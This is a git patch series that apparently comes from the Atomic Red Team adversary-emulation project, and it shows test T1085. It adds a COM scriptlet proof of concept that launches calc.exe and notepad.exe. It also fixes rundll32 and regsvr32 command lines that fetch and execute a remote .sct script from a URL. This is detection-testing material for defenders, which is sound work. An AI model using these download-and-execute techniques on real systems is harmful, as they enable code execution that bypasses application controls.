From a44c2b6d6da20c76700f7c0dd37869702ce375c2 Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Wed, 20 Jun 2018 11:34:58 -0600
Subject: [PATCH 1/3] Fixed Broken Link to Payload

---
 atomics/T1085/T1085.sct | 44 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 atomics/T1085/T1085.sct

diff --git a/atomics/T1085/T1085.sct b/atomics/T1085/T1085.sct
new file mode 100644
index 00000000..035b60e7
--- /dev/null
+++ b/atomics/T1085/T1085.sct
@@ -0,0 +1,44 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>

From d8ac8e8be9ffd663e76ffa533d2cf38862c3a72d Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Wed, 20 Jun 2018 11:40:32 -0600
Subject: [PATCH 2/3] Fix cmdline

---
 atomics/T1085/T1085.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml
index d6a37515..7aba52cf 100644
--- a/atomics/T1085/T1085.yaml
+++ b/atomics/T1085/T1085.yaml
@@ -11,8 +11,8 @@ atomic_tests:
     file_url:
       description: location of the payload
       type: Url
-      default: hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
   executor:
     name: command_prompt
     command: |
-      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
+      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"

From b9d0011c6c9127e5f60aed8dd668df0fe36e0fa1 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 20 Jun 2018 17:41:16 +0000
Subject: [PATCH 3/3] Generate docs from job=validate_atomics_generate_docs
 branch=fix-deadlink-cs

---
 atomics/T1085/T1085.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md
index 3a37b690..0b2873e6 100644
--- a/atomics/T1085/T1085.md
+++ b/atomics/T1085/T1085.md
@@ -36,10 +36,10 @@ Test execution of a remote script using rundll32.exe
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| file_url | location of the payload | Url | hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
+| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
 
 #### Run it with `command_prompt`!
 ```
-rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
+rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
 ```
 <br/>